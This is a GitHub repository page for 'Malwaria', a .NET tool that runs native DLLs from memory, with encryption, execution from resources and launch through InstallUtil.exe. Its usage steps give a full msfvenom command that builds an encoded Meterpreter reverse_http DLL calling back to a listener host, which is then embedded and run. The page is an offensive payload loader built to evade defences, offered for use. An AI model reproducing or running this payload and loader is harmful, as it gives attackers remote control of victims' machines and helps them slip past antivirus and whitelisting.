Skip to content

cnbird1999/Malwaria

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Malwaria

Execute Native DLL from .NET

Based on https://github.com/Scavanger/MemoryModule.net

Added Crypto Support

Added Ability To Execute From Resource

Added Ability to be launched via InstallUtil.exe

Rough Prototype

  1. Create The DLL:
./msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 3 -f dll -a x86 LHOST=192.168.249.129 LPORT=8080 > msf.dll
  1. Add DLL To Project

  2. Compile and Execute

About

Execute Native DLL from .NET

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages